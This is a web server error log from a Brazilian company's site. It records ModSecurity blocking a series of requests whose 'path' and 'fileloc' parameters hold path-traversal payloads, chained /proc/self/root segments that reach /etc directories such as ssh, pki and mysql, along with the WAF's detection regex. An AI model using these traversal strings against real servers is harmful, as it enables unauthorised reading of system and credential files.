[Thu Mar 19 04:04:41.478909 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:36922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugCcdf6f5d65gmYZQ7WwAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:04:43.125830 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:36938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugC8df6f5d65gmYZQ7YAAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:04:56.004565 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:36952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugGAbLMZ6AikZjR9UlqwAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:04:57.327186 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.241.31:51274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugGQbLMZ6AikZjR9UlrgAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:04:58.699224 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:51284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugGvu8EFLIOrSqIptmBwAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:05:00.021234 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:51290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugHAkwaGbbGflqUZB8wAAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:05:01.399147 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.241.31:51292] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugHV_V7PWP6ixUYl6EPQAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:05:05.313019 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.241.31:51306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugHxkFeYa1D6dYQnC1dQAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:05:07.039026 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.241.31:51320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugIxkFeYa1D6dYQnC1eAAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:05:10.735392 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.243.128:38594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugJgbLMZ6AikZjR9UluwAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:05:15.507823 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:34834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugK8df6f5d65gmYZQ7dwAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:05:16.792624 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:34836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugLMdf6f5d65gmYZQ7ewAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:05:17.195946 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.243.128:52724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugLV_V7PWP6ixUYl6ERwAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:05:18.091053 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:36522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugLsdf6f5d65gmYZQ7fwAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:05:19.386981 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:36528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugLwkwaGbbGflqUZB8xAAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:05:22.866074 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.241.31:36544] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugMgbLMZ6AikZjR9UlwwAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:05:24.160901 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.241.31:36560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugNBkFeYa1D6dYQnC1hgAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:05:31.885865 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:36566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugO8df6f5d65gmYZQ7iAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:05:33.141702 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:47264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugPcdf6f5d65gmYZQ7iwAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:05:44.037377 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.241.31:47276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugR_u8EFLIOrSqIptmKAAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:05:47.768784 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.241.31:47236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abugSxkFeYa1D6dYQnC1kwAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
